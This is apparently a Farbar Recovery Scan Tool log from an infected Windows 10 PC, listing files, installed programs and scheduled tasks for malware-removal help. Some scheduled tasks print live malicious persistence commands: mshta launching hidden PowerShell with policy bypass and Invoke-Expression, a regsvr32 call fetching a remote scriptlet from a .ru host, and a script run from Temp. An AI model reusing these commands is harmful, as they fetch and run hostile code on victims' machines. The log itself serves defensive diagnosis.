2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\system32\sr-Cyrl-RS
2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\system32\sr-Cyrl-BA
2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\system32\sd-Arab-PK
2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\system32\rw-RW
2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\system32\quc-Latn-GT
2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\system32\pa-Arab-PK
2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\system32\nso-ZA
2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\system32\ku-Arab-IQ
2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\system32\ig-NG
2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\system32\chr-CHER-US
2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\system32\ha-Latn-NG
2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\system32\ca-ES-valencia
2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\system32\bs-Latn-BA
2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\system32\az-Latn-AZ
2018-08-15 01:41 - 2018-04-12 01:38 - 000000000 ___SD C:\Windows\SysWOW64\F12
2018-08-15 01:41 - 2018-04-12 01:38 - 000000000 ___SD C:\Windows\system32\F12
2018-08-15 01:41 - 2018-04-12 01:38 - 000000000 ___SD C:\Windows\system32\DiagSvcs
2018-08-15 01:41 - 2018-04-12 01:38 - 000000000 ___RD C:\Program Files\Windows Defender
2018-08-15 01:41 - 2018-04-12 01:38 - 000000000 ____D C:\Windows\TextInput
2018-08-15 01:41 - 2018-04-12 01:38 - 000000000 ____D C:\Windows\ShellExperiences
2018-08-15 01:41 - 2018-04-12 01:38 - 000000000 ____D C:\Windows\bcastdvr
2018-08-15 01:41 - 2018-04-12 01:38 - 000000000 ____D C:\Program Files (x86)\Windows Defender
2018-08-14 21:27 - 2018-06-03 02:24 - 000000000 ____D C:\Windows\system32\MRT
2018-08-14 21:26 - 2018-06-03 02:24 - 137343192 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2018-08-14 21:26 - 2018-04-12 01:30 - 000000000 ____D C:\Windows\CbsTemp
2018-08-11 19:36 - 2018-06-16 15:34 - 000000000 ____D C:\Users\cheat\Documents\Euro Truck Simulator 2
2018-08-11 16:37 - 2018-06-09 19:04 - 000000000 ____D C:\Users\cheat\AppData\Local\JDownloader v2.0
2018-08-10 14:14 - 2018-07-16 23:25 - 000003958 _____ C:\Windows\System32\Tasks\Opera scheduled Autoupdate 1531776355
2018-08-10 14:14 - 2018-07-16 23:25 - 000001078 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Prohlížeč Opera.lnk
2018-08-10 14:14 - 2018-07-16 23:25 - 000000000 ____D C:\Program Files\Opera
2018-08-10 00:19 - 2018-06-02 23:14 - 000002502 _____ C:\Users\cheat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2018-08-10 00:19 - 2018-06-02 23:14 - 000002465 _____ C:\Users\cheat\Desktop\Google Chrome.lnk
2018-08-06 17:19 - 2018-04-12 01:41 - 000836480 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2018-08-06 17:19 - 2018-04-12 01:41 - 000181120 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2018-08-06 14:19 - 2018-06-16 23:35 - 000000000 ____D C:\Users\cheat\AppData\Local\ElevatedDiagnostics
2018-08-04 23:20 - 2018-04-12 01:38 - 000000000 ____D C:\Windows\system32\NDF
2018-07-29 23:36 - 2018-04-12 01:38 - 000000000 ____D C:\Windows\system32\FxsTmp
2018-07-29 15:25 - 2018-06-03 00:05 - 000000000 ____D C:\Windows\Panther
2018-07-29 15:20 - 2018-04-12 01:38 - 000000000 ___HD C:\Windows\system32\GroupPolicy
2018-07-29 15:20 - 2018-04-12 01:38 - 000000000 ____D C:\Windows\SysWOW64\GroupPolicy
2018-07-29 15:15 - 2018-06-09 17:16 - 000008613 _____ C:\Windows\diagwrn.xml
2018-07-29 15:15 - 2018-06-09 17:16 - 000003813 _____ C:\Windows\diagerr.xml
2018-07-28 21:42 - 2018-06-03 16:14 - 000000000 ____D C:\Program Files (x86)\Rockstar Games
2018-07-28 21:41 - 2018-06-03 16:14 - 000000000 ____D C:\Program Files\Rockstar Games
2018-07-28 21:30 - 2018-06-02 23:10 - 000000000 ____D C:\Users\cheat\AppData\Local\Packages
2018-07-27 22:21 - 2018-06-09 17:39 - 000000000 ____D C:\Users\cheat\AppData\LocalLow\Mozilla
2018-07-26 00:28 - 2018-04-12 17:53 - 000000000 ____D C:\Program Files\Windows Defender Advanced Threat Protection
2018-07-26 00:28 - 2018-04-12 01:38 - 000000000 ___SD C:\Windows\system32\UNP
2018-07-26 00:28 - 2018-04-12 01:38 - 000000000 ___RD C:\Windows\PrintDialog
2018-07-26 00:28 - 2018-04-12 01:38 - 000000000 ____D C:\Windows\system32\ShellExperiences
2018-07-25 21:40 - 2018-06-03 22:09 - 000000000 ____D C:\Users\cheat\AppData\Local\Ubisoft Game Launcher

==================== Files in the root of some directories =======

2018-08-17 20:21 - 2018-08-23 21:18 - 296048640 __RSH () C:\Users\cheat\AppData\Roaming\sui.exe

Files to move or delete:
====================



Some files in TEMP:
====================
2018-08-17 21:15 - 2018-08-03 01:54 - 035345904 _____ (Digital Wave Ltd ) C:\Users\cheat\AppData\Local\Temp\FreeYouTubeDownload_4.1.82.802_d.exe
2018-08-09 02:26 - 2018-08-02 13:38 - 045663912 _____ (jooseng/www.PortableAppZ.ru) C:\Users\cheat\AppData\Local\Temp\Setup.exe

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2018-06-02 23:05

==================== End of FRST.txt ============================

[Cryman]

Addition log

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 23.08.2018
Ran by cheat (24-08-2018 21:36:05)
Running from C:\Users\cheat\Desktop
Windows 10 Pro Version 1803 17134.228 (X64) (2018-06-02 21:08:15)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-1409225181-4065645274-1912239689-500 - Administrator - Disabled)
cheat (S-1-5-21-1409225181-4065645274-1912239689-1002 - Administrator - Enabled) => C:\Users\cheat
DefaultAccount (S-1-5-21-1409225181-4065645274-1912239689-503 - Limited - Disabled)
Guest (S-1-5-21-1409225181-4065645274-1912239689-501 - Limited - Disabled)
WDAGUtilityAccount (S-1-5-21-1409225181-4065645274-1912239689-504 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

7-Zip 18.05 (x64) (HKLM\...\7-Zip) (Version: 18.05 - Igor Pavlov)
AI Suite 3 (HKLM-x32\...\{D46DA5F0-25AD-4B77-98DA-6DD6AF39FBD9}) (Version: 1.00.56 - ASUSTeK Computer Inc.)
Aktualizace NVIDIA 31.2.0.0 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Update) (Version: 31.2.0.0 - NVIDIA Corporation) Hidden
Apple Mobile Device Support (HKLM\...\{64695C4A-C68F-46B5-A734-50EBF124A68E}) (Version: 11.3.3.4 - Apple Inc.)
ASUS GLCKIO2 Driver (HKLM-x32\...\{548dd834-70c5-4426-8065-fbeabdd2bb5d}) (Version: 1.0.10 - ASUSTeK Computer Inc.) Hidden
ASUS GLCKIO2 Driver (HKLM-x32\...\{5960FD0F-BB3B-49AF-B175-F77DC91E995A}) (Version: 1.0.10 - ASUSTeK Computer Inc.) Hidden
ASUS GPU TweakII (HKLM-x32\...\{0075AAC2-EA9F-490E-83F7-5D5F81EB2A43}) (Version: 1.6.2.0 - ASUSTek COMPUTER INC.) Hidden
ASUS GPU TweakII (HKLM-x32\...\InstallShield_{0075AAC2-EA9F-490E-83F7-5D5F81EB2A43}) (Version: 1.6.2.0 - ASUSTek COMPUTER INC.)
ASUS ROG Gaming Mouse GX1000 V1.0 (HKLM-x32\...\{DBDEF130-96CB-4999-B6E1-06594BD0EDD6}_is1) (Version: 1.00.00.00 - )
Asus Sonic Suite Plugins (HKLM-x32\...\{f0c1caa6-9d8d-47a9-b9a0-1d83ded7e857}) (Version: 1.2.401 - ASUSTeKcomputer.Inc) Hidden
ASUS Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.101.0 - ASUSTeK Computer Inc.) Hidden
AURA (HKLM-x32\...\{5899CD4F-8764-4303-A0D9-C60A62CFC24F}) (Version: 1.06.29 - ASUSTeK Computer Inc.)
AURA DRAM Component (HKLM\...\{3881F403-B6B7-4D2F-BDAC-7901EB677F52}) (Version: 1.0.4 - ASUS) Hidden
AURA DRAM Component (HKLM-x32\...\{c23c281b-0c0f-4c58-b069-92db94049ad0}) (Version: 1.0.4 - ASUS) Hidden
AURA Service (HKLM-x32\...\{0E536061-3B55-4D45-BF58-0BDA261C94B0}) (Version: 1.00.33 - ASUSTeK Computer Inc.) Hidden
AURA Service (HKLM-x32\...\{5adb80f9-1040-4375-8c2c-9eea2624cbf7}) (Version: 1.00.33 - ASUSTeK Computer Inc.) Hidden
Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment)
Battlefield 1 (HKLM-x32\...\Battlefield 1_is1) (Version: - )
Bethesda.net Launcher (HKLM-x32\...\{3448917E-E4FE-4E30-9502-9FD52EABB6F5}_is1) (Version: 1.36.2 - Bethesda Softworks)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
Corsair AURA DRAM Component (HKLM\...\{376E0869-A4F1-4DC7-A1FD-EBF3AFFEB832}) (Version: 1.0.3 - CORSAIR COMPONENTS INC.) Hidden
Corsair AURA DRAM Component (HKLM-x32\...\{0589c0a4-38f0-40bc-9296-8be22aa26522}) (Version: 1.0.3 - CORSAIR COMPONENTS INC.) Hidden
Creation Kit: Fallout 4 (HKLM-x32\...\Creation Kit: Fallout 4) (Version: - Bethesda Softworks)
Crysis 3 (HKLM-x32\...\{EE648111-C93F-46B5-B425-E643F63BFDFD}_is1) (Version: - )
Diablo III (HKLM-x32\...\Diablo III) (Version: - Blizzard Entertainment)
Direct Video Downloader version 2.12 (HKLM-x32\...\{5FB07C70-45DA-45C9-AAD3-F805D4C463D5}_is1) (Version: 2.12 - Major Share, MajorShare.com)
DisplayDriverAnalyzer (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_DisplayDriverAnalyzer) (Version: 398.36 - NVIDIA Corporation) Hidden
Focusrite USB 4.36.5.0 (HKLM\...\Focusrite USB_is1) (Version: 4.36.5.0 - Focusrite Audio Engineering Ltd.)
FormatFactory 4.3.0.0 (HKLM-x32\...\FormatFactory) (Version: 4.3.0.0 - Free Time)
Free YouTube Download (HKLM-x32\...\Free YouTube Download_is1) (Version: 4.1.82.802 - Digital Wave Ltd)
Google Chrome (HKU\S-1-5-21-1409225181-4065645274-1912239689-1002\...\Google Chrome) (Version: 68.0.3440.106 - Google Inc.)
Cheat Engine 6.8.1 (HKLM-x32\...\Cheat Engine 6.8.1_is1) (Version: - Cheat Engine)
Intel Extreme Tuning Utility (HKLM-x32\...\{1d91bf86-43a0-4b7a-8fdf-76c3bfb5a36f}) (Version: 6.4.1.23 - Intel Corporation)
Intel Extreme Tuning Utility (HKLM-x32\...\{FA506D5A-CCF5-4D4D-A218-FFB31F36EACF}) (Version: 6.4.1.23 - Intel Corporation) Hidden
Intel Processor Diagnostic Tool 64bit (HKLM\...\{3D0D4C18-4C13-4890-B55D-764150A35E0C}) (Version: 4.1.0.27 - Intel Corporation)
Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.0.6.1194 - Intel Corporation)
Intel(R) Network Connections 23.1.100.0 (HKLM\...\PROSetDX) (Version: 23.1.100.0 - Intel)
Internet Download Manager (HKLM-x32\...\Internet Download Manager) (Version: - Tonec Inc.)
Java 8 Update 181 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180181F0}) (Version: 8.0.1810.13 - Oracle Corporation)
JDownloader 2 (HKLM\...\jdownloader2) (Version: 2.0 - AppWork GmbH)
Kingo ROOT version 1.5.8.3353 (HKLM-x32\...\{AE7675D6-0B31-494F-ABFA-822E1A0FDF17}_is1) (Version: 1.5.8.3353 - Kingosoft Technology Ltd.)
Kingston AURA DRAM Component (HKLM\...\{6D2D2DAF-BFE4-45A6-BF40-8A9F7FF54F42}) (Version: 1.0.3 - KINGSTON COMPONENTS INC.) Hidden
Kingston AURA DRAM Component (HKLM-x32\...\{a1697240-f3cf-483c-a9d2-3cd9e5bf3615}) (Version: 1.0.3 - KINGSTON COMPONENTS INC.) Hidden
MakeMKV v1.12.3 (HKLM-x32\...\MakeMKV) (Version: v1.12.3 - GuinpinSoft inc)
Malwarebytes verze 3.5.1.2522 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.5.1.2522 - Malwarebytes)
Microsoft OneDrive (HKU\S-1-5-21-1409225181-4065645274-1912239689-1002\...\OneDriveSetup.exe) (Version: 18.095.0510.0001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.13.26020 (HKLM-x32\...\{7474cd6e-76cc-4257-837e-5b9261e526af}) (Version: 14.13.26020.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.13.26020 (HKLM-x32\...\{5c045b7f-e561-4794-91f8-c6cda0893107}) (Version: 14.13.26020.0 - Microsoft Corporation)
MiniTool Partition Wizard Free 10.2.3 (HKLM\...\{05D996FA-ADCB-4D23-BA3C-A7C184A8FAC6}_is1) (Version: - MiniTool Solution Ltd.)
MotoGP 18 (HKLM-x32\...\MotoGP 18_is1) (Version: - )
Mozilla Firefox 61.0.1 (x64 cs) (HKLM\...\Mozilla Firefox 61.0.1 (x64 cs)) (Version: 61.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 60.0.2 - Mozilla)
NahimicSettingsConfigurator (HKLM\...\{3094F0B9-A3E1-4A01-9B0F-2531645C72CF}) (Version: 1.2.401 - ASUSTeKcomputer.Inc) Hidden
Nexus Mod Manager (HKLM\...\6af12c54-643b-4752-87d0-8335503010de_is1) (Version: 0.65.2 - Black Tree Gaming)
Notepad++ (64-bit x64) (HKLM\...\Notepad++) (Version: 7.5.6 - Notepad++ Team)
NVIDIA GeForce Experience 3.14.0.139 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.14.0.139 - NVIDIA Corporation)
NVIDIA Ovladač 3D Vision 398.36 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 398.36 - NVIDIA Corporation)
NVIDIA Ovladač HD audia 1.3.37.4 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.37.4 - NVIDIA Corporation)
NVIDIA Ovladač řídící jednotky 3D Vision 390.41 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 390.41 - NVIDIA Corporation)
NVIDIA Ovladače grafiky 398.36 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 398.36 - NVIDIA Corporation)
NVIDIA Systémový software PhysX 9.17.0524 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.17.0524 - NVIDIA Corporation)
OBS Studio (HKLM-x32\...\OBS Studio) (Version: 21.1.2 - OBS Project)
Opera Stable 54.0.2952.71 (HKLM-x32\...\Opera 54.0.2952.71) (Version: 54.0.2952.71 - Opera Software)
Oracle VM VirtualBox 5.2.12 (HKLM\...\{128AD467-F107-4FED-A283-F355E74DE103}) (Version: 5.2.12 - Oracle Corporation)
Ovládací panel NVIDIA 398.36 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.ControlPanel) (Version: 398.36 - NVIDIA Corporation) Hidden
Patriot Viper RGB (HKLM\...\{E42E13B0-071E-49C1-B1CC-58198E82F302}) (Version: 1.00.02 - Patriot Memory) Hidden
Patriot Viper RGB (HKLM-x32\...\{d549ba94-f6a7-4153-9c75-2e40ec8e1c8e}) (Version: 1.00.02 - Patriot Memory)
PE Explorer 1.99 R6 (HKLM-x32\...\PE Explorer_is1) (Version: 1.99.6 - Heaventools Software)
Podpora aplikací Apple (32bitová) (HKLM-x32\...\{C56BA005-F02C-461B-ACA5-A0CE3E32578F}) (Version: 6.5 - Apple Inc.)
Podpora aplikací Apple (64bitová) (HKLM\...\{C8087B7C-8496-45BE-92FB-91D31EB73969}) (Version: 6.5 - Apple Inc.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.8186 - Realtek Semiconductor Corp.)
Rockstar Games Social Club (HKLM-x32\...\Rockstar Games Social Club) (Version: 1.2.4.0 - Rockstar Games)
ShareX (HKLM\...\82E6AC09-0FEF-4390-AD9F-0DD3F5561EFC_is1) (Version: 12.2.0 - ShareX Team)
Sonic Radar (HKLM\...\{0FB2E1BE-0747-468A-AD6B-4043B7BDDED5}) (Version: 1.2.401 - ASUSTeKcomputer.Inc)
SpaceEngine verze 0.9.8.0 (HKLM-x32\...\{6E7A40FA-86CE-4844-A7DC-F8769F21A62F}_is1) (Version: 0.9.8.0 - SpaceEngine)
Spotify (HKU\S-1-5-21-1409225181-4065645274-1912239689-1002\...\Spotify) (Version: 1.0.88.353.g15c26ea1 - Spotify AB)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Steam Customizer (HKU\S-1-5-21-1409225181-4065645274-1912239689-1002\...\Steam Customizer) (Version: 1.00.00.00 - Blumont)
Stellarium 0.18.1 (HKLM\...\Stellarium_is1) (Version: 0.18.1 - Stellarium team)
TeamViewer 13 (HKLM-x32\...\TeamViewer) (Version: 13.1.3629 - TeamViewer)
Total Commander 64-bit (Remove or Repair) (HKLM\...\Totalcmd64) (Version: 9.12 - Ghisler Software GmbH)
TruckersMP Launcher 1.0.0.4 (HKLM\...\{A227B892-C548-4490-9C5D-DB341F8194A6}_is1) (Version: 1.0.0.4 - TruckersMP Team)
Uplay (HKLM-x32\...\Uplay) (Version: 60.0 - Ubisoft)
VLC media player (HKLM\...\VLC media player) (Version: 3.0.3 - VideoLAN)
Winaero Tweaker (HKLM\...\Winaero Tweaker_is1) (Version: 0.10.2.0 - Winaero)
WinDirStat 1.1.2 (HKU\S-1-5-21-1409225181-4065645274-1912239689-1002\...\WinDirStat) (Version: - )
WinPcap 4.1.3 (HKLM-x32\...\WinPcapInst) (Version: 4.1.0.2980 - Riverbed Technology, Inc.)
Wireshark 2.6.2 64-bit (HKLM-x32\...\Wireshark) (Version: 2.6.2 - The Wireshark developer community, hxxps://www.wireshark.org)
Yousician Launcher version 1.0 (HKLM-x32\...\{EF45EAE9-523E-47C3-8634-A81923B11DD5}_is1) (Version: 1.0 - Yousician)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-1409225181-4065645274-1912239689-1002_Classes\CLSID\{A2C6CB58-C076-425C-ACB7-6D19D64428CD}\localserver32 -> C:\Users\cheat\AppData\Local\Google\Chrome\Application\68.0.3440.106\notification_helper.exe (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1409225181-4065645274-1912239689-1002_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\cheat\AppData\Local\Google\Update\1.3.33.17\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1409225181-4065645274-1912239689-1002_Classes\CLSID\{EA724FD3-844D-43A9-A8C9-A5BC35FC20E4}\InprocServer32 -> C:\Users\cheat\AppData\Local\Google\Update\1.3.33.17\psuser_64.dll (Google Inc.)
ShellIconOverlayIdentifiers: [ IDM Shell Extension] -> {CDC95B92-E27C-4745-A8C5-64A52A78855D} => C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll [2018-03-30] (Tonec Inc.)
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2018-04-30] (Igor Pavlov)
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files\Notepad++\NppShell_06.dll [2018-03-19] ()
ContextMenuHandlers1: [FormatFactoryShell] -> {A3777921-CFD3-4A6B-89BF-08E6B95716E8} => C:\Program Files (x86)\FormatFactory\ShellEx64_104.dll [2018-03-19] (Free Time)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2018-05-09] (Malwarebytes)
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2018-04-30] (Igor Pavlov)
ContextMenuHandlers4: [FormatFactoryShell] -> {A3777921-CFD3-4A6B-89BF-08E6B95716E8} => C:\Program Files (x86)\FormatFactory\ShellEx64_104.dll [2018-03-19] (Free Time)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\system32\nvshext.dll [2018-06-24] (NVIDIA Corporation)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2018-04-30] (Igor Pavlov)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2018-05-09] (Malwarebytes)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {01DE9554-77CF-4DCD-856C-1D35CD0DC839} - System32\Tasks\ASUS\AsRogAuraGpuDllServer => C:\Program Files (x86)\LightingService\\AsRogAuraGpuDllServer.exe [2018-04-25] ()
Task: {05375E1B-5499-4980-9F05-704620108A27} - System32\Tasks\SystemSettings => mshta vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -WindowStyle hidden -ep bypass -nop -c $e=(Get-ItemProperty HKLM:\Software\a);Select-Object -ExpandProperty Shell;Invoke-Expression $e",0,True)(window.close)
Task: {0BDF41B0-6EED-4C97-83DC-A6F42AF0AF96} - System32\Tasks\WindowsUpdateTool => regsvr32 /s /n /u /i:hxxp://googleprovider.ru/y.sct scrobj.dll <==== ATTENTION
Task: {115AC25A-F716-47CB-AF6B-7FFB463DAC42} - System32\Tasks\GPU Tweak II => C:\Program Files (x86)\ASUS\GPU TweakII\GPUTweakII.exe [2018-03-26] (ASUSTeK COMPUTER INC.)
Task: {1BBF7EE4-F4BD-478F-8400-222AA8FF2CA8} - System32\Tasks\ASUS\ASUS DIPAwayMode => C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe [2013-08-08] ()
Task: {2277E42E-F290-4C64-A4E4-ACDE1BC03BF0} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2018-05-23] (NVIDIA Corporation)
Task: {2F225687-E7A1-48D5-AF68-1E53AD3FBEED} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2018-05-23] (NVIDIA Corporation)
Task: {380034C3-C735-46E7-8194-3F1C5ABBFC82} - System32\Tasks\NvBatteryBoostCheckOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [2018-05-23] (NVIDIA Corporation)
Task: {3E7D1B43-B03C-4F51-A016-009FB90E7270} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [2018-05-23] (NVIDIA Corporation)
Task: {471298CA-6FF7-4704-AE3F-8241BCEC462A} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [2018-05-23] (NVIDIA Corporation)
Task: {4A971A56-40FF-43C8-A489-C3A6202387EE} - System32\Tasks\anydesk => C:\Users\cheat\AppData\Local\Temp\setupm.js [2018-07-27] () <==== ATTENTION
Task: {5B5D9814-A23C-48F0-B72B-36EC161EAECF} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.16.17656.18052-0\MpCmdRun.exe [2018-06-03] (Microsoft Corporation)
Task: {63904DC6-2EBE-443C-BEB5-B302416D4F84} - System32\Tasks\SystemSettingss => mshta vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -WindowStyle hidden -ep bypass -nop -c $e=(Get-ItemProperty HKLM:\Software\WOW6432Node\a);Select-Object -ExpandProperty Shell;Invoke-Expression $e",0,True)(window.close)
Task: {65B85F6F-35B3-4459-A179-28255D5B7B25} - System32\Tasks\Microsoft\Windows\HelloFace\FODCleanupTask => C:\Windows\System32\WinBioPlugIns\FaceFodUninstaller.exe [2018-04-12] ()
Task: {67AA10A0-CBBA-49C7-AA5E-5C8283AC6325} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [2018-05-23] (NVIDIA Corporation)
Task: {67C044D2-42AC-4993-9B36-C2994E608238} - System32\Tasks\S-1-5-21-1409225181-4065645274-1912239689-1002\DataSenseLiveTileTask => C:\Windows\System32\DataUsageLiveTileTask.exe [2018-04-12] (Microsoft Corporation)
Task: {6AA2DAFE-A960-4009-9DFB-4BAF74335C2C} - System32\Tasks\Opera scheduled Autoupdate 1531776355 => C:\Program Files\Opera\launcher.exe [2018-08-07] (Opera Software)
Task: {70270BEE-6903-426F-8BEB-50960F1E983A} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.16.17656.18052-0\MpCmdRun.exe [2018-06-03] (Microsoft Corporation)
